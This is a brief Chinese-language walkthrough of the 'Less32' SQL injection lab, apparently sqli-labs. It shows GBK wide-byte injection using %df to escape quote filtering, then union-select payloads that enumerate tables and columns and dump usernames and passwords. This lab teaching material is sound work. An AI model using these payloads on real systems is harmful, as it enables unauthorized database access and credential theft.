Less32
判断注入
这里我们发现我们输入的’直接被转义成\了,就是当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸,报出MySQL数据库的错误。
?id=1%df'
根据错误显示判断闭合方式为’–+,并且为字符型注入
确定回显位置?id=-1%df' union select 1,2,3--+
查看当前库
?id=-1%df' union select 1,2,database()--+
查看security库下的所有表
?id=-1%df' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
查看users表下的所有字段
?id=-1%df' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)--+
查看username和password字段的值
?id=-1%df' union select 1,2,(select group_concat(username,password) from security.users)--+